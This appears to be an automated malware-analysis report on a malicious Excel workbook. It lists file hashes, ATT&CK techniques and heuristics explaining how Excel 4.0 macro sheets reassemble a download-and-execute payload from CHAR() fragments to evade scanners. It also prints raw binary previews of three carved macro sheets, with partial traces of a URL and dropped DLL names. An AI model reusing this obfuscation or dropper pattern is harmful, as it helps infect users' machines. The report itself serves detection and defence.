Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 80afad8cad6c0a84…

MALICIOUS

Office (OOXML)

155.1 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-28
MD5: 79d94d53703ee58ab2aac1782cbd6939 SHA-1: 16a918e278d56ed854a3314d2a4ea907001195fc SHA-256: 80afad8cad6c0a84c232d5d17354b11ff9e5920d65c2552047801bc73a8bec82
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is identified as malicious due to the presence of Excel 4.0 macro sheets. These sheets contain reassembled payloads, indicated by CHAR() and split formulas, which are designed to download and execute a second-stage payload from the embedded URL. The specific nature of the payload is not discernible from the provided evidence, leading to an 'unknown family' classification.

Heuristics 2

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.bin 5827 bytes
SHA-256: 865ab6ecca92e5c90fc28bbfb3c5677f6893cf12f68231266cb8abbb1ecd112f
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �      �       F   �  %      ��                  & �  �             @   d           � $                                    �  �  %      ��    & �  I     ,     �  <     9   I         < :   :   $         < ;   B   I         < C   �?  I         �  �  %      ��    &           ,        :   C     :         <         =         >         ?             @             B           %      ��    &           ,        :   C     :             <         =             >         ?             @             B       %      ��    &           ,        :   C     :         <         =         >         ?             @             B       %      ��    &           ,        :   C     :         <         =             >         ?       	     @         A         B         C       %      ��    &           ,        :   C     :         <         =       
     >         ?             @         A         B         C       %      ��    &           ,        :   F     :             <         =         >         ?         @         A         B         C         D         E         F       %      ��    &   !       ,        :   F     :       
     <         =         >         ?             A         B         C         D         E         F       %      ��    &   "       ,        :   F     :             <         =         >         ?         @         A         B         C         D         E         F       %      ��    &   #       ,        :   F     :             <         =         >             ?             @         A         B             C         D         E         F       %      ��    &   $       ,        :   F     :             =         >         ?         @         A         B             C         D         E         F       %      ��    &   %       ,        :   F     :             =         >         ?         @         A         B         C         D         E         F       %      ��    &   &       ,        :   F     :         =             >             ?         @         A         B         C         D         E         F       %      ��    &   '       ,        :   F     >         ?         @         A         B         C         D         E         F       %      ��    &   (       ,        :   F     =       
     A         C         D         E         F       %      ��    &   )       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   *       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   +       ,        :   F     :         =             A         B         C         D         E         F       %      ��    &   ,       ,        :   F     =             A         B         C         D         E         F       %      ��    &   -       ,        :   F     A         B         C         D         E         F       %      ��    &   .       ,        :   F     A         B         C         D         E         F       %      ��    &   /       ,        :   F     A         B         C         D         E         F       %      ��    &   0       ,        5   F     A         B         C         D         E         F       %      ��    &   1       ,        5   F     5         A         B         C         D         E         F       %      ��    &   2       ,        5   F     A         B         C         D         E         F       %      ��    &   3       ,        5   F     A         B         C         D         E         F       %      ��    &   4       ,        5   F     A         B         C         D         E         F       %      ��    &   5       ,        5   F     A         B         C         D         E         F       %      ��    &   6       ,        5   F     A         B         C         D         E         F       %      ��    &   7       ,        5   F     B       %      ��    &   8       ,        5   F     B       %      ��    &   9       ,        5   F     B       %      ��    &   ;       ,        5   F     B       %      ��    &   <       ,        5   F     B      
... (truncated)
xlm_sheet_01.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.bin 1178 bytes
SHA-256: f4819779647ecf294bc5364c014ef020fbf7fe514c907c00c8c11b4050071fa2
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �          &   4   �  %      ��                  & �  �             @   d d         � $                                    �  �  %      ��    & �  �     ,     �  < 0   0             < 1   4   �         �  �  %      ��    &           ,        &   2     &       %      ��    &   	       ,        &   2     &         2       %      ��    &   
       ,        &   2     2       %      ��    &           ,        &   2     2       %      ��    &           ,        &   2     2       %      ��    &   
       ,        &   2     /         2       %      ��    &           ,        &   2     /         0       %      ��    &           ,        &   2     /         0         2       %      ��    &           ,        0   3     0       %      ��    &           ,        0   3     0       %      ��    &           ,        0   3   
 0              B 6     %      ��    &           ,        0   3     0         1         3       %      ��    &           ,        0   3     0         1         3       �  � B                                                                  �   �� 0ffffff�?ffffff�?      �?      �?333333�?333333�?%      ��                  & �
xlm_sheet_02.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.bin 3882 bytes
SHA-256: df8bd9f2cf5b7eba0d541d79e4fc3aa37da4e275222043bcbfc50f54bee4ab96
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �  #   ;   =   C   �  %      ��                  & �  �             @   d d         � $                                    �  �  %      ��    & �  �     ,     �  < <   <   m         < =   C   �         �  �  %      ��    &   #       ,        =   C    � =       $  �    �������TA   ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA   Z      ?�:      2�B `�  ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�   �������TA    ��;�u')LAc   ��9��9HA�     U Z      2� Z      ?� Z      ?� :  	   2�B `�     %      ��    &   $       ,        =   C     =       %      ��    &   %       ,        =   C   
)=              Z  #   B�:      2�B `�    %      ��    &   &       ,        =   C   
C=          0   Z      @�Z      @� Z      @�    B  :      2�B `�    %      ��    &   '       ,        =   C   
)=              Z  .   C�:      2�B `�    %      ��    &   (       ,        =   C   
)=              Z  $   B�:  
   2�B `�    %      ��    &   )       ,        =   C   
)=              Z  &   >�:      2�B `�    %      ��    &   *       ,        =   C   
i=          V      U Z      2� Z      ?� Z      =� Z      ?� Z  !   ?� Z      =�    e A  :  
   2�B `�    %      ��    &   +       ,        =   C   
� =          $   Z  &   =�Z      B� Z      2� Z  *   =� Z  	   2� Z  (   =� Z  )   =� Z  (   =� Z  
   2� Z  (   =� Z  )   =� Z  (   =� Z      2� Z  (   =� Z  ,   =� Z  )   =� Z  (   =�    h t t p s : / /  Z  
   2� Z  (   =� Z  )   =� Z  (   =� Z  4   B� Z  (   =� Z  ,   =� Z  ,   =� Z  +   =� :  
   0�B `�    %      ��    &   -       ,        =   C   
%=                 D o c 2    B  �    %      ��    &   .       ,        =   C   
8=          %      D o c 4    B  �   D o c 3    B  �      HC           L   0      L d e c v s b g v r s x L x r g x g L    B t     %      ��    &   1       ,        =   B   
� =          p   Z      2�Z      :� Z  #   :� Z  $   :� Z  %   :� Z  !   :� Z  "   :� Z  !   :� Z  3   B� Z      :� :  
   0�B `�      B       %      ��    &   2       ,        =   B   
� =          p   Z      2�Z      :� Z  #   :� Z  $   :� Z  %   :� Z  !   :� Z  "   :� Z  !   :� Z  4   B� Z      :� :      0�B `�      B       %      ��    &   3       ,        =   B    IB           . . \ c o v i 1 . d l l          . . \ c o v i 1 . d l l     %      ��    &   4       ,        =   B   
� =          4   Z  &   =�Z      B� Z      2� Z  *   =� Z  	   2� Z  (   =� Z  )   =� Z  (   =� Z  
   2� Z  (   =� Z  )   =� Z  (   =� Z      2� Z  (   =� Z  ,   =� Z  )   =� Z  (   =�    h t t p s : / /  Z      2� Z  (   =� Z  )   =� Z  (   =� Z  3   B� Z  (   =� Z  ,   =� Z  ,   =� Z  +   =� :  	   0�B `�      � A ��A/       IB           . . \ c o v i 2 . d l l          . . \ c o v i 2 . d l l     %      ��    &   5       ,        =   B     B       %      ��    &   6       ,        =   B     B       %      ��    &   8       ,        =   B   
 =              :      0�A5     %      ��    &   ;       ,        =   B    FB           L   .      L d e c v s b g v r s x L x r g x g    B s     �  � B                                                                  �  �� 0ffffff�?ffffff�?      �?      �?333333�?333333�?%      ��                  & �